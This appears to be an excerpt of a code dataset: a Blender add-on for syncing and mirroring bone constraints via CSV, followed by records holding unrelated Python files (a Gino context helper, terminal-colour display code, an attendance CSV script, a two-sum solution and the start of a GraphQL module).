import bone_constraints\n    from . import common\n\nimport bpy\nimport re\n\nclass StringValGroup(bpy.types.PropertyGroup):\n    string_val = bpy.props.StringProperty()\n\nbpy.utils.register_class(StringValGroup)\n\nclass MySettings(bpy.types.PropertyGroup):\n\n#    emotion = bpy.props.EnumProperty(\n#        name = \"Emotion\",\n#        description = \"Select emotion of registration destination.\",\n#        items = common.emotions\n#    )\n\n#    overwrite_data = bpy.props.BoolProperty(\n#        name = \"Overwrite Data\",\n#        description = \"Enable or disable overwriting of data.\",\n#        default = True\n#    )\n\n    csv_file_name = bpy.props.StringProperty(\n        name = \"csv_file_name\",\n        description = \"CSV file name.\"\n    )\n    csv_file_directory = bpy.props.StringProperty(subtype=\"FILE_PATH\")\n\n    msg_chk = bpy.props.StringProperty()\n    msg_icon = bpy.props.StringProperty()\n\n\n    msg_x_miller_chk = bpy.props.StringProperty()\n    #msg_x_miller_icon = bpy.props.StringProperty()\n\n    # Name of the object selected in the list\n    #sel_armaturej= bpy.props.StringProperty()\n\n    # Property that stores the selected value\n    sel_armature = bpy.props.StringProperty()\n    sel_string_val = bpy.props.StringProperty()\n\n    # List of values shown in the drop-down list\n    string_val_list = bpy.props.CollectionProperty(type=bpy.types.StringValGroup)\n\n    direction = bpy.props.EnumProperty(\n        name = \"Direction\",\n        description = \"Select constraints copy direction.\",\n        items = common.directions\n    )\n\n    def init_val_list(self):\n        self.string_val_list.clear()\n        for obj in bpy.data.objects:\n            if obj.type == 'ARMATURE':\n                v = self.string_val_list.add()\n                v.string_val = obj.name\n                v.name = obj.name\n\n    def check(self):\n        if self.csv_file_name == \"\":\n            self.msg_chk = bpy.app.translations.pgettext(\"Select CSV file.\")\n            self.msg_icon = \"ERROR\"\n        elif self.sel_armature == \"\":\n            self.msg_chk = bpy.app.translations.\\\n                pgettext(\"Select target Armature.\")\n            self.msg_icon = \"ERROR\"\n        else:\n            self.msg_chk = \"OK\"\n            self.msg_icon = \"INFO\"\n\n\n\n    # def check_x_miller(self):\n    #     self.msg_x_miller_chk = \"OK\"\n    #     self.msg_x_miller_icon = \"INFO\"\n\n#    def update_val(self, nm):\n#        for sv in self.string_val_list:\n#            if sv.name == nm:\n#                self.sel_string_val = sv.string_val\n\nclass SelectCSVFile(bpy.types.Operator):\n\n    bl_idname = \"object.select_csv_file\"\n    bl_label = bpy.app.translations.pgettext(\"Select CSV File\")\n    bl_description = bpy.app.translations.pgettext(\"Select CSV File\")\n    bl_options = {'REGISTER', 'UNDO'}\n\n    filepath = bpy.props.StringProperty(subtype=\"FILE_PATH\")\n    filename = bpy.props.StringProperty(name=\"filename\")\n    directory = bpy.props.StringProperty(subtype=\"FILE_PATH\")\n    # Search Filter\n    filter_glob = bpy.props.StringProperty(\n        default=\"*.csv\",\n        options={'HIDDEN'}\n    )\n\n    def execute(self, context):\n        self.report(\n            {'INFO'},\n            \" [FilePath] %s, [FileName] %s, [Directory] %s\"\n            % (self.filepath, self.filename, self.directory)\n        )\n        props = context.window_manager.sync_bone_constraints_props\n        props.csv_file_directory = self.directory\n        props.csv_file_name = self.filename\n        return {'FINISHED'}\n\n    def invoke(self, context, event):\n        wm = context.window_manager\n        # Show File Browser\n        wm.fileselect_add(self)\n\n        return {'RUNNING_MODAL'}\n\nclass NullOperation(bpy.types.Operator):\n\n    bl_idname = \"object.null_operation\"\n    bl_label = \"NOP\"\n    bl_description = \"Do nothing\"\n    bl_options = {'REGISTER', 'UNDO'}\n\n    def execute(self, context):\n        return {'FINISHED'}\n\n#class NullOperationMenu(bpy.types.Menu):\n#\n#    bl_idname = \"object.null_operation_menu\"\n#    bl_label = \"NOP Menu\"\n#    
bl_description = \"Menu with multiple processes that do nothing\"\n\n# def draw(self, context):\n# layout = self.layout\n# # メニュー項目の追加\n# for i in range(3):\n# layout.operator(NullOperation.bl_idname, text=(\"項目 %d\" % (i)))\n\nclass SyncBonesIK(bpy.types.Operator):\n\n bl_idname = \"object.sync_bones_ik\"\n bl_label = \"SyncBonesIK\"\n bl_description = \"Sync bones Invese Kinematics Settings.\"\n bl_options = {'REGISTER', 'UNDO'}\n\n def execute(self, context):\n props = context.window_manager.sync_bone_constraints_props\n\n fromArmature = bpy.context.object.name\n for x in bpy.data.objects[props.sel_armature].pose.bones:\n if x.name in bpy.data.objects[fromArmature].pose.bones:\n fromBone = bpy.data.objects[fromArmature].pose.bones[x.name]\n x.ik_min_x = fromBone.ik_min_x\n x.ik_min_y = fromBone.ik_min_y\n x.ik_min_z = fromBone.ik_min_z\n x.ik_max_x = fromBone.ik_max_x\n x.ik_max_y = fromBone.ik_max_y\n x.ik_max_z = fromBone.ik_max_z\n x.use_ik_limit_x = fromBone.use_ik_limit_x\n x.use_ik_limit_y = fromBone.use_ik_limit_y\n x.use_ik_limit_z = fromBone.use_ik_limit_z\n x.ik_stretch = fromBone.ik_stretch\n x.lock_ik_x = fromBone.lock_ik_x\n x.lock_ik_y = fromBone.lock_ik_y\n x.lock_ik_z = fromBone.lock_ik_z\n\n return {'FINISHED'}\n\n\n# Sync Bone Constraints\nclass SyncBoneConstraints(bpy.types.Operator):\n\n bl_idname = \"object.sync_bone_constraints\"\n bl_label = \"Sync\"\n bl_description = \"Sync bones constraints of Armatures.\"\n bl_options = {'REGISTER', 'UNDO'}\n\n def execute(self, context):\n ExportBoneConstraints.execute(ExportBoneConstraints, context)\n ImportBoneConstraints.execute(ImportBoneConstraints, context)\n SyncBonesIK.execute(SyncBonesIK, context)\n return {'FINISHED'}\n\nclass ExportBoneConstraints(bpy.types.Operator):\n\n bl_idname = \"object.export_bone_constraints\"\n bl_label = \"Export\"\n bl_description = \"Export bones constraints to CSV File.\"\n bl_options = {'REGISTER', 'UNDO'}\n\n def execute(self, context):\n bone_data = []\n bone_data.append(bone_constraints.BoneConstraints.header)\n\n for x in bpy.context.selected_pose_bones:\n # SKIP Special Bone\n if x.name == \"Controllers_Root\":\n continue\n\n if len(x.constraints) == 0:\n data = bone_constraints.BoneConstraints()\n data.bone_name = x.name\n bone_data.append(data.row)\n\n for y in x.constraints:\n data = bone_constraints.BoneConstraints()\n if y.type == \"TRANSFORM\":\n print(x.name + \", \" + y.name)\n\n data.bone_name = x.name\n data.constraint_name = y.name\n data.mute = y.mute\n data.target = y.target.name\n data.subtarget_bone_name = y.subtarget\n data.extrapolate = y.use_motion_extrapolate\n data.from_min_x = y.from_min_x\n data.from_max_x = y.from_max_x\n data.from_min_y = y.from_min_y\n data.from_max_y = y.from_max_y\n data.from_min_z = y.from_min_z\n data.from_max_z = y.from_max_z\n data.map_to_x_from = y.map_to_x_from\n data.map_to_y_from = y.map_to_y_from\n data.map_to_z_from = y.map_to_z_from\n data.map_to = y.map_to\n\n if y.map_to == \"LOCATION\":\n data.to_min_x = y.to_min_x\n data.to_max_x = y.to_max_x\n data.to_min_y = y.to_min_y\n data.to_max_y = y.to_max_y\n data.to_min_z = y.to_min_z\n data.to_max_z = y.to_max_z\n elif y.map_to == \"ROTATION\":\n data.to_min_x = y.to_min_x_rot\n data.to_max_x = y.to_max_x_rot\n data.to_min_y = y.to_min_y_rot\n data.to_max_y = y.to_max_y_rot\n data.to_min_z = y.to_min_z_rot\n data.to_max_z = y.to_max_z_rot\n else:\n # map_to:SCALE\n data.to_min_x = y.to_min_x_scale\n data.to_max_x = y.to_max_x_scale\n data.to_min_y = y.to_min_y_scale\n 
data.to_max_y = y.to_max_y_scale\n data.to_min_z = y.to_min_z_scale\n data.to_max_z = y.to_max_z_scale\n\n data.target_space = y.target_space\n data.owner_space = y.owner_space\n data.influence = y.influence\n data.type = y.type\n\n bone_data.append(data.row)\n elif y.type == \"COPY_LOCATION\":\n print(x.name + \", \" + y.name)\n\n data.bone_name = x.name\n data.constraint_name = y.name\n data.mute = y.mute\n data.target = y.target.name\n data.subtarget_bone_name = y.subtarget\n\n data.from_min_x = y.use_x\n data.from_max_x = y.invert_x\n data.from_min_y = y.use_y\n data.from_max_y = y.invert_y\n data.from_min_z = y.use_z\n data.from_max_z = y.invert_z\n\n data.target_space = y.target_space\n data.owner_space = y.owner_space\n data.influence = y.influence\n data.type = y.type\n data.head_tail = y.head_tail\n data.use_offset = y.use_offset\n\n bone_data.append(data.row)\n\n elif y.type == \"COPY_ROTATION\":\n print(x.name + \", \" + y.name)\n\n data.bone_name = x.name\n data.constraint_name = y.name\n data.mute = y.mute\n data.target = y.target.name\n data.subtarget_bone_name = y.subtarget\n\n data.from_min_x = y.use_x\n data.from_max_x = y.invert_x\n data.from_min_y = y.use_y\n data.from_max_y = y.invert_y\n data.from_min_z = y.use_z\n data.from_max_z = y.invert_z\n\n data.target_space = y.target_space\n data.owner_space = y.owner_space\n data.influence = y.influence\n data.type = y.type\n data.use_offset = y.use_offset\n\n bone_data.append(data.row)\n\n elif y.type == \"IK\":\n print(x.name + \", \" + y.name)\n\n data.bone_name = x.name\n data.constraint_name = y.name\n data.mute = y.mute\n data.target = y.target.name\n data.subtarget_bone_name = y.subtarget\n\n data.influence = y.influence\n data.type = y.type\n\n data.pole_target = y.pole_target\n data.pole_subtarget = y.pole_subtarget\n data.pole_angle = y.pole_angle\n data.iterations = y.iterations\n data.chain_count = y.chain_count\n data.use_tail = y.use_tail\n data.use_stretch = y.use_stretch\n data.use_location = y.use_location\n data.weight = y.weight\n data.use_rotation = y.use_rotation\n data.orient_weight = y.orient_weight\n\n bone_data.append(data.row)\n\n\n props = context.window_manager.sync_bone_constraints_props\n utils_io_csv.write(props.csv_file_directory,\n props.csv_file_name,\n bone_data)\n return {'FINISHED'}\n\nclass ImportBoneConstraints(bpy.types.Operator):\n\n bl_idname = \"object.import_bone_constraints\"\n bl_label = \"Import\"\n bl_description = \"Import bones constraints from CSV file.\"\n bl_options = {'REGISTER', 'UNDO'}\n\n def execute(self, context):\n props = context.window_manager.sync_bone_constraints_props\n target = props.sel_armature\n props = context.window_manager.sync_bone_constraints_props\n header, data = utils_io_csv.read(props.csv_file_directory, \\\n props.csv_file_name)\n\n for row in data:\n if bpy.data.objects.find(target) == -1:\n print(\"Object not found. Object name is \" + target)\n break\n\n con = bone_constraints.BoneConstraints(row)\n\n if bpy.data.objects[target].pose.bones.find(con.bone_name) == -1:\n print(\"Bone not found. 
Bone name is \" + con.bone_name)\n break\n bone = bpy.data.objects[target].pose.bones[con.bone_name]\n for x in bone.constraints:\n bone.constraints.remove(x)\n\n for row in data:\n\n con = bone_constraints.BoneConstraints(row)\n\n bone = bpy.data.objects[target].pose.bones[con.bone_name]\n\n if con.constraint_name is None or con.constraint_name == \"\":\n continue\n\n if bone.constraints.find(con.constraint_name) == -1:\n constraint = bone.constraints.new(type=con.type)\n constraint.name = con.constraint_name\n\n constraint = bone.constraints[con.constraint_name]\n\n print(\"bone:\" + bone.name + \" constraint:\" + constraint.name)\n\n constraint.mute = con.mute == \"True\"\n constraint.target = bpy.data.objects[target]\n constraint.subtarget = con.subtarget_bone_name\n\n if con.type == \"TRANSFORM\":\n constraint.use_motion_extrapolate = con.extrapolate == \"True\"\n\n constraint.from_min_x = float(con.from_min_x)\n constraint.from_max_x = float(con.from_max_x)\n constraint.from_min_y = float(con.from_min_y)\n constraint.from_max_y = float(con.from_max_y)\n constraint.from_min_z = float(con.from_min_z)\n constraint.from_max_z = float(con.from_max_z)\n\n constraint.map_to_x_from = con.map_to_x_from\n constraint.map_to_y_from = con.map_to_y_from\n constraint.map_to_z_from = con.map_to_z_from\n constraint.map_to = con.map_to\n if constraint.map_to == \"LOCATION\":\n constraint.to_min_x = float(con.to_min_x)\n constraint.to_max_x = float(con.to_max_x)\n constraint.to_min_y = float(con.to_min_y)\n constraint.to_max_y = float(con.to_max_y)\n constraint.to_min_z = float(con.to_min_z)\n constraint.to_max_z = float(con.to_max_z)\n elif constraint.map_to == \"ROTATION\":\n constraint.to_min_x_rot = float(con.to_min_x)\n constraint.to_max_x_rot = float(con.to_max_x)\n constraint.to_min_y_rot = float(con.to_min_y)\n constraint.to_max_y_rot = float(con.to_max_y)\n constraint.to_min_z_rot = float(con.to_min_z)\n constraint.to_max_z_rot = float(con.to_max_z)\n else:\n # map_to:SCALE\n constraint.to_min_x_scale = float(con.to_min_x)\n constraint.to_max_x_scale = float(con.to_max_x)\n constraint.to_min_y_scale = float(con.to_min_y)\n constraint.to_max_y_scale = float(con.to_max_y)\n constraint.to_min_z_scale = float(con.to_min_z)\n constraint.to_max_z_scale = float(con.to_max_z)\n elif con.type == \"COPY_LOCATION\":\n constraint.use_x = con.from_min_x == \"True\"\n constraint.invert_x = con.from_max_x == \"True\"\n constraint.use_y = con.from_min_y == \"True\"\n constraint.invert_y = con.from_max_y == \"True\"\n constraint.use_z = con.from_min_z == \"True\"\n constraint.invert_z = con.from_max_z == \"True\"\n constraint.head_tail = float(con.head_tail)\n constraint.use_offset = con.use_offset\n elif con.type == \"COPY_ROTATION\":\n constraint.use_x = con.from_min_x == \"True\"\n constraint.invert_x = con.from_max_x == \"True\"\n constraint.use_y = con.from_min_y == \"True\"\n constraint.invert_y = con.from_max_y == \"True\"\n constraint.use_z = con.from_min_z == \"True\"\n constraint.invert_z = con.from_max_z == \"True\"\n constraint.use_offset = con.use_offset\n\n if con.type == \"TRANSFORM\" or con.type == \"COPY_LOCATION\" or \\\n con.type == \"COPY_ROTATION\":\n constraint.target_space = con.target_space\n constraint.owner_space = con.owner_space\n\n constraint.influence = con.influence\n\n if con.type == \"IK\":\n if con.pole_target != \"\":\n constraint.pole_target = bpy.data.objects[target]\n if con.pole_subtarget != \"\":\n constraint.pole_subtarget = con.pole_subtarget\n constraint.pole_angle = 
con.pole_angle\n            constraint.iterations = con.iterations\n            constraint.chain_count = con.chain_count\n            constraint.use_tail = con.use_tail\n            constraint.use_stretch = con.use_stretch\n            constraint.use_location = con.use_location\n            constraint.weight = con.weight\n            constraint.use_rotation = con.use_rotation\n            constraint.orient_weight = con.orient_weight\n\n        return {'FINISHED'}\n\n\nclass XMillerTransformations(bpy.types.Operator):\n\n    bl_idname = \"object.x_miller_transformations\"\n    bl_label = \"XMillerTransformations\"\n    bl_description = \"X-Axis Miller Bone Transformation constraints.\"\n    bl_options = {'REGISTER', 'UNDO'}\n\n    def execute(self, context):\n\n        props = context.window_manager.sync_bone_constraints_props\n\n        props.msg_x_miller_chk = bpy.app.translations.pgettext(\"Start.\")\n\n        if props.direction == \"l2r\":\n            key = r\"\\.L($|\\.|_)\"\n            other_side = \"R\"\n        else:\n            key = r\"\\.R($|\\.|_)\"\n            other_side = \"L\"\n\n        for x in bpy.context.selected_pose_bones:\n\n            # SKIP Other side & Center bones\n            if re.search(key, x.name) is None:\n                continue\n\n            print(re.search(key, x.name) == False)\n\n            if len(x.constraints) == 0:\n                continue\n\n            for y in x.constraints:\n                if y.type == \"TRANSFORM\":\n                    print(x.name + \", \" + y.name)\n\n                    # search other side bone & constraint\n                    other_side_bone_name =\\\n                        common.get_otherside_name(key, other_side, x.name)\n\n                    if re.search(key, y.subtarget) is None:\n                        continue\n\n                    other_side_tgt_name =\\\n                        common.get_otherside_name(key, other_side, y.subtarget)\n\n                    x2 = x.id_data.pose.bones[other_side_bone_name]\n                    y2 = x2.constraints[y.name]\n\n\n                    # data.bone_name = x.name\n                    # data.constraint_name = y.name\n                    y2.mute = y.mute\n                    # y2.target = y.target.name\n                    y2.subtarget = other_side_tgt_name\n                    y2.use_motion_extrapolate = y.use_motion_extrapolate\n                    y2.from_min_x = y.from_min_x\n                    y2.from_max_x = y.from_max_x\n                    y2.from_min_y = y.from_min_y\n                    y2.from_max_y = y.from_max_y\n                    y2.from_min_z = y.from_min_z\n                    y2.from_max_z = y.from_max_z\n                    y2.map_to_x_from = y.map_to_x_from\n                    y2.map_to_y_from = y.map_to_y_from\n                    y2.map_to_z_from = y.map_to_z_from\n                    y2.map_to = y.map_to\n\n                    if y.map_to == \"LOCATION\":\n                        y2.to_min_x = y.to_min_x\n                        y2.to_max_x = y.to_max_x\n                        y2.to_min_y = y.to_min_y\n                        y2.to_max_y = y.to_max_y\n                        y2.to_min_z = y.to_min_z\n                        y2.to_max_z = y.to_max_z\n                    elif y.map_to == \"ROTATION\":\n                        y2.to_min_x_rot = y.to_min_x_rot\n                        y2.to_max_x_rot = y.to_max_x_rot\n                        y2.to_min_y_rot = y.to_min_y_rot\n                        y2.to_max_y_rot = y.to_max_y_rot\n                        y2.to_min_z_rot = y.to_min_z_rot\n                        y2.to_max_z_rot = y.to_max_z_rot\n                    else:\n                        # map_to:SCALE\n                        y2.to_min_x_scale = y.to_min_x_scale\n                        y2.to_max_x_scale = y.to_max_x_scale\n                        y2.to_max_y_scale = y.to_max_y_scale\n                        y2.to_min_y_scale = y.to_min_y_scale\n                        y2.to_min_z_scale = y.to_min_z_scale\n                        y2.to_max_z_scale = y.to_max_z_scale\n\n                    y2.target_space = y.target_space\n                    y2.owner_space = y.owner_space\n                    y2.influence = y.influence\n                    # y2.type = y.type\n\n        props.msg_x_miller_chk = bpy.app.translations.pgettext(\"Finished.\")\n\n        return {'FINISHED'}\n\n\n\n# Add \"Auto Breakdown\" tab on Tool Shelf\nclass VIEW3D_PT_AutoBreakdown(bpy.types.Panel):\n\n    bl_label = bpy.app.translations.pgettext(\"Sync Bone Constraints\")\n    # String on TAB\n    bl_space_type = 'VIEW_3D'           # Area which show menu\n    bl_region_type = 'TOOLS'            # Region which show menu\n    bl_category = bpy.app.translations.pgettext(\"Auto Breakdown\")\n    # String displayed in the header of the menu that opened the tab\n    bl_context = \"posemode\"             # Context which show panel\n\n
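    # --- Added note (not from the original add-on): in Blender, a Panel's\n    # poll() classmethod gates whether the panel is drawn at all; returning\n    # False hides the whole tab, so the loop below is equivalent to\n    #     return any(o.select for o in bpy.data.objects)\n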
    # Decide whether this class's processing can run\n    @classmethod\n    def poll(cls, context):\n        # Show the menu only while an object is selected\n        for o in bpy.data.objects:\n            if o.select:\n                return True\n        return False\n\n    # Customize the header\n    def draw_header(self, context):\n        layout = self.layout\n        layout.label(text=\"\", icon='PLUGIN')\n\n    # Draw the menu\n    def draw(self, context):\n        layout = self.layout\n        scene = context.scene\n        props = context.window_manager.sync_bone_constraints_props\n\n\n        # Show the file browser\n        layout.label(text = props.csv_file_directory)\n        layout.label(text = props.csv_file_name)\n        layout.operator(SelectCSVFile.bl_idname)\n\n#        # CharacterName\n#        layout.label(text = bpy.app.translations.pgettext(\"Character Name:\"))\n#        layout.label(text = bpy.path.abspath(\"//\"))\n\n#        # display the properties\n#        layout.prop(props, \"emotion\", \\\n#            text=bpy.app.translations.pgettext(\"Emotion\"))\n\n#        layout.separator()\n\n#        layout.prop(props, \"overwrite_data\", \\\n#            text=bpy.app.translations.pgettext(\"Overwrite Data\"))\n\n\n#        layout.prop_search(props, \"sel_obj\", context.scene, \\\n#            \"objects\", text=\"Objects\")\n#        row = layout.row()\n#        row.prop_search(props, \"sel_obj\", context.scene, \"objects\", text=\"Objects\")\n#        row = layout.row()\n#        row.prop(props, \"sel_obj\")\n\n        row = layout.row()\n\n        props.init_val_list()\n\n        row.prop_search(props, \"sel_armature\", props,\n                        \"string_val_list\",\n                        text = bpy.app.translations.pgettext(\"Target\"),\n                        icon=\"OUTLINER_OB_ARMATURE\")\n\n#        row = layout.row()\n#        row.prop(props, \"sel_armature\")\n\n        # props.update_val(props.sel_armature)\n#        row.prop(props, \"sel_string_val\")\n\n        layout.separator()\n\n        row = layout.row()\n        box = row.box()\n        box_row = box.row()\n\n        props.check()\n\n        box_row.label(text = props.msg_chk, icon=props.msg_icon)\n\n        layout.operator(SyncBoneConstraints.bl_idname, \\\n                text = bpy.app.translations.pgettext(\"Sync\"))\n\n#        layout.separator()\n\n#        layout.operator(ExportBoneConstraints.bl_idname, \\\n#            text = bpy.app.translations.pgettext(\"Write CSV\"))\n\n#        layout.separator()\n\n#        layout.operator(ImportBoneConstraints.bl_idname, \\\n#            text = bpy.app.translations.pgettext(\"Read CSV\"))\n\n#        layout.separator()\n\n#        layout.operator(SyncBonesIK.bl_idname, \\\n\n\n# Add X-Miller Function Panel\nclass VIEW3D_PT_XMiller(bpy.types.Panel):\n\n    bl_label = bpy.app.translations.pgettext(\"X-Miller Bone Transformations\")\n    # String on TAB\n    bl_space_type = 'VIEW_3D'           # Area which show menu\n    bl_region_type = 'TOOLS'            # Region which show menu\n    bl_category = bpy.app.translations.pgettext(\"Auto Breakdown\")\n    # String displayed in the header of the menu that opened the tab\n    bl_context = \"posemode\"             # Context which show panel\n\n    # Decide whether this class's processing can run\n    @classmethod\n    def poll(cls, context):\n        # Show the menu only while an object is selected\n        for o in bpy.data.objects:\n            if o.select:\n                return True\n        return False\n\n    # Customize the header\n    def draw_header(self, context):\n        layout = self.layout\n        layout.label(text=\"\", icon='PLUGIN')\n\n    # Draw the menu\n    def draw(self, context):\n        layout = self.layout\n        scene = context.scene\n        props = context.window_manager.sync_bone_constraints_props\n\n\n        layout.prop(props, \"direction\", \\\n            text=bpy.app.translations.pgettext(\"direction\"))\n\n        layout.separator()\n\n        row = layout.row()\n        box = row.box()\n        box_row = box.row()\n\n        # props.check_x_miller()\n\n        box_row.label(text = props.msg_x_miller_chk, icon=\"NONE\")\n\n        layout.operator(XMillerTransformations.bl_idname, \\\n                text = bpy.app.translations.pgettext(\"Copy\"))\n\n
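# --- Added note (not from the original add-on): the X-miller copy relies on\n# Blender's \".L\"/\".R\" bone-suffix convention; conceptually something like\n#     re.sub(r\"\\.L($|\\.|_)\", lambda m: \".R\" + m.group(1), \"Arm.L\")  # -> \"Arm.R\"\n# is what common.get_otherside_name() is assumed to perform.\n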
IK\"))\n","repo_name":"natukikazemizo/Sedna1.0","sub_path":"src/python/addons/animation_auto_breakdown/sync_bone_constraints.py","file_name":"sync_bone_constraints.py","file_ext":"py","file_size_in_byte":27340,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"39"} +{"seq_id":"12143731526","text":"from contextvars import ContextVar\nfrom typing import Type, TypeVar\n\nfrom gino import Gino\n\n\n__all__ = \"ContextGino\",\n\nT = TypeVar(\"T\")\n\n\nclass ContextGino(Gino):\n \"\"\"\n For context bind, and pool.\n usage is simple\n just ContextGino.get_current() but only in functions, and something lke this\n and you should ready for atack of gino engine instance\n but take care about global \"GINO\"'s\n like that globals may raise huge problems\n \"\"\"\n # unfortunetly, variant of\n # using with ContextInstanceMixin from aiogram\n # not working\n __context_instance = ContextVar(\"context_gino\")\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n self.set_current(ContextGino)\n\n @classmethod\n def get_current(cls: Type[T], no_error: bool = True) -> T:\n try:\n ctx = cls.__context_instance.get()\n except LookupError:\n if no_error:\n return\n raise\n else:\n return ctx\n\n @classmethod\n def set_current(cls: Type[T], value: T) -> None:\n assert not isinstance(value, cls), \\\n f'Value should be instance of {cls.__name__!r} not {type(value).__name__!r}'\n cls.__context_instance.set(value)\n","repo_name":"pikoUsername/authboi","sub_path":"iternal/store/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":1252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"16946761587","text":"import contextlib\n\nimport click\nimport sty\n\nimport xthematic.colors\nimport xthematic.themes\nfrom xthematic.term import TERMINAL_COLORS\n\n\nclass ColoredContext:\n all_color_identifiers = set(xthematic.colors.ColorIdentifier.all_four_bit_colors())\n\n def __init__(self):\n self.used_color_ids = set()\n self.overwritten_colors = {}\n\n @property\n def registered_ids(self):\n return set(self.overwritten_colors.keys())\n\n @property\n def free(self):\n return self.all_color_identifiers - self.registered_ids - self.used_color_ids\n\n def register_color(self, color):\n if len(self.free) < 0:\n raise RuntimeError(\"cannot register any more color values.\")\n elif color in xthematic.term.TERMINAL_COLORS.values():\n raise ValueError(f\"color {color} is already defined in the terminal's colors\")\n\n id_ = self.free.pop()\n self.overwritten_colors[id_] = xthematic.term.TERMINAL_COLORS[id_]\n try:\n xthematic.term.TERMINAL_COLORS[id_] = color\n except Exception:\n del self.overwritten_colors[id_]\n raise\n\n def unregister_color(self, color):\n id_ = self.id_for_color(color)\n xthematic.term.TERMINAL_COLORS[id_] = self.overwritten_colors[id_]\n del self.overwritten_colors[id_]\n self.used_color_ids.remove(id_)\n\n def unregister_all(self):\n for id_ in self.registered_ids:\n xthematic.term.TERMINAL_COLORS[id_] = self.overwritten_colors[id_]\n self.overwritten_colors.clear()\n self.used_color_ids.clear()\n\n def format_string_for_ids(self, fg_id=None, bg_id=None):\n s = '{}' + sty.rs.all\n if fg_id:\n s = sty.fg(fg_id.four_bit_color_name) + s\n self.used_color_ids.add(fg_id)\n if bg_id:\n s = sty.bg(bg_id.four_bit_color_name) + s\n self.used_color_ids.add(bg_id)\n return s\n\n def format_string_for_colors(self, fg_color=None, bg_color=None):\n fg_id = 
self.id_for_color(fg_color) if fg_color else None\n bg_id = self.id_for_color(bg_color) if bg_color else None\n return self.format_string_for_ids(fg_id=fg_id, bg_id=bg_id)\n\n @staticmethod\n def printable_colors():\n return xthematic.term.TERMINAL_COLORS.values()\n\n @staticmethod\n def id_for_color(color):\n for id_, value in xthematic.term.TERMINAL_COLORS.items():\n if value == color:\n return id_\n raise ValueError(f\"there is no registered {color}\")\n\n\nclass ColoredStream:\n def __init__(self, context):\n self.context = context\n\n @classmethod\n @contextlib.contextmanager\n def open(cls):\n cc = ColoredContext()\n yield cls(context=cc)\n cc.unregister_all()\n\n def echo_by_id(self, text, nl=True, fg_id=None, bg_id=None):\n s = self.context.format_string_for_ids(fg_id=fg_id, bg_id=bg_id)\n click.echo(s.format(text), nl=nl)\n\n def echo(self, text, nl=True, fg=None, bg=None):\n if fg and fg not in self.context.printable_colors():\n self.context.register_color(fg)\n if bg and bg not in self.context.printable_colors():\n self.context.register_color(bg)\n s = self.context.format_string_for_colors(fg_color=fg, bg_color=bg)\n click.echo(s.format(text), nl=nl)\n\n\ndef escape_sequence_index_string(fg_id, bg_id):\n fg_bright = int(fg_id.id in range(8, 16))\n return f'{fg_bright};{30+(fg_id.id % 8)};{40+(bg_id.id % 8)}'\n\n\ndef echo_theme(theme_name=None):\n with ColoredStream.open() as stream:\n for row_id in xthematic.colors.ColorIdentifier.all_four_bit_colors():\n for col_id in list(xthematic.colors.ColorIdentifier.all_four_bit_colors())[:8]:\n stream.echo_by_id(text=escape_sequence_index_string(fg_id=row_id, bg_id=col_id),\n nl=False, fg_id=row_id, bg_id=col_id)\n click.echo(' ', nl=False)\n click.echo(nl=True)\n input()\n\n\n","repo_name":"taesko/xthematic","sub_path":"src/xthematic/display.py","file_name":"display.py","file_ext":"py","file_size_in_byte":4002,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"23000275621","text":"# https://leetcode.com/problems/two-sum/\n\nclass Solution:\n \n def twoSum(self, nums: List[int], target: int) -> List[int]:\n \n dic = {}\n \n for i, num in enumerate(nums):\n dic[num] = i\n \n for i, num in enumerate(nums):\n \n pair = target - num\n \n if pair in dic and dic[pair] != i:\n return [i, dic[pair]]\n","repo_name":"soldambi/code-practice","sub_path":"LeetCode/two-sum.py","file_name":"two-sum.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"27509528006","text":"import csv\nfrom datetime import datetime,date,time,timedelta\n\ntime_format_str = '%H:%M:%S'\ndate_format_str = '%Y-%m-%d'\nnow_format_str = '%Y-%m-%d %H:%M:%S'\nname1 = 'Abigail Peterson'\nname2 = 'Anita Oliver'\ncode_str1 = '041405513376'\ncode_str2 = '041078536769'\n\ndef time_now():\n\tnow = datetime.now().strftime(time_format_str)\n\tnow = str(now)\n\treturn now\n\t\ndef date_now():\n\ttoday = datetime.now().strftime(date_format_str)\n\ttoday = str(today)\n\treturn today\n\t\ndef main():\t\n\twith open('./attendances/'+date_now()+'.csv',mode='r') as csvfile:\n\t\tcsvreader = csv.reader(csvfile)\n\t\tindex = -1\n\t\tall_line_rev = list(reversed(list(csvreader)))\n\t\tfor row in all_line_rev:\n\t\t\tindex += 1\n\t\t\tif row[1] == code_str1:\n\t\t\t\tbreak\n\t\t\n\t\tall_line_rev[index][3] = 'MLEBU'\n\t\tall_line = list(reversed(all_line_rev))\n\t\t\n\twith open('./attendances/'+date_now()+'.csv',mode='w') as 
csvfile:\n\t\tpresence_write = csv.writer(csvfile, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n\t\tfor rows in all_line:\n\t\t\tpresence_write.writerow(rows)\n\nif __name__ == \"__main__\":\n\ttry:\n\t\tmain()\n\texcept KeyboardInterrupt:\n\t\tpass\n\t\t\n# with open('./attendances/'+date_input+'.csv',mode='a') as writing:\n\t\t# presence_write = csv.writer(writing, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n\t\t# presence_write.writerow([time_input,id,employee_full,status])\n\t\t\n\t\t\n\t\t\n\t\t\n","repo_name":"bimanjayaaji/rfid-attendance--odoo","sub_path":"_archieved/csv_form.py","file_name":"csv_form.py","file_ext":"py","file_size_in_byte":1342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"28192142342","text":"import datetime\n\nimport graphene\nimport sqlalchemy as sa\nfrom graphene import ObjectType\nfrom sqlalchemy.ext.asyncio import AsyncSession\n\nfrom models.db_models import (\n Place,\n SecretPlaceExtra,\n Category,\n ActionsEconomy,\n)\nfrom utils.api_auth import AuthChecker\nfrom utils.config import settings as s\nfrom utils.smp_exceptions import Exc, ExceptionGroupEnum, ExceptionReasonEnum\nfrom ..gql_id import decode_gql_id\nfrom ..gql_types.place_type import PlaceType\nfrom ..service_types.coin_change_object import 